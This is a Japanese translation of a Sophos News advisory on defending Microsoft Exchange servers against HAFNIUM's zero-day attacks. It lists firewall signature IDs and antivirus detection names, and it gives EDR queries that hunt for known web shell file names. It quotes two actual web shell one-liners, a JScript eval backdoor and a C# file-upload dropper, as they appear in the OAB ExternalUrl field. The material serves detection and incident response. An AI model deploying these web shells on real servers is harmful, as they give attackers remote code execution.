Site icon Sophos News

HAFNIUM (ハフニウム) による攻撃からのソフォスの顧客の保護について

** 本記事は、Protecting Sophos customers from HAFNIUM の翻訳です。最新の情報は英語記事をご覧ください。**

Microsoft Exchange に影響する 4 つの新たなゼロデイの脆弱性が、国家支援型と考えられているサイバー攻撃組織であるHAFNIUM (ハフニウム) によって現在攻撃されています。

オンプレミスで Exchange Server を実行している場合は、速やかにパッチを適用し、セキュリティ侵害の痕跡がないかネットワークを調査する必要 があります。

HAFNIUM に対するソフォスの保護

Sophos MTR、およびソフォスのネットワークセキュリティ製品、エンドポイントセキュリティ製品を利用されているお客様は、いくつもの機能によって、これらの新しい脆弱性に対する攻撃から保護されています。

Sophos MTR

The Sophos MTR チームは、これらの脆弱性が公開されてから、関連する攻撃についてお客様の環境を監視しています。これらの脆弱性に関連する攻撃が特定された場合、インシデントケースが作成され、お客様に通知されます。

Sophos Firewall

SophosLabs は、SFOS および XFOS を実行しているお客様向けに IPS シグネチャを公開しました。

CVE SID
CVE-2021-26855 57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857 57233, 57234
CVE-2021-26858 57245, 57246
CVE-2021-27065 57245, 57246

 

ネットワークでこれらの検出名が表示された場合は、詳細に調査し、修正する必要があります。

Sophos Intercept X Advanced および Sophos Antivirus (SAV)

お客様は、以下のアンチウイルスシグネチャによる検出名で、HAFNIUM による攻撃を検出できます。

Web shell 関連

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/AspScChk-A

その他のペイロード

  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Web シェルには、動的な性質があります。これらのシェルはブロックされますが、手動で削除する必要があります。ネットワークでこれらの検出名が表示された場合は、詳細に調査し、修正する必要があります。

また、関連する C&C サーバーの IP の宛先についてもブロックしました。

さらに、攻撃の lsass ダンプのステージは、認証情報の保護機能 (CredGuard) によってブロックされます。この機能は、すべての Intercept X Advanced サブスクリプションで利用できます。

Sophos EDR

Sophos EDR のお客様は、すでに準備されているクエリを利用して、攻撃に利用されている可能性がある Web シェルを特定して調査できます。

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

このクエリで検出された Web シェルを表示すると、通常、Exchange オフラインアドレス帳 (OAB) の構成ファイル内の ExternalUrl フィールドにこの Web シェルが表示されます。例:

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

 

セキュリティ侵害の痕跡の特定

Sophos MTR チームは、ネットワークを調査して、セキュリティ侵害の痕跡を特定する方法について、詳しい手順を記載したガイド を公開しています。

Exit mobile version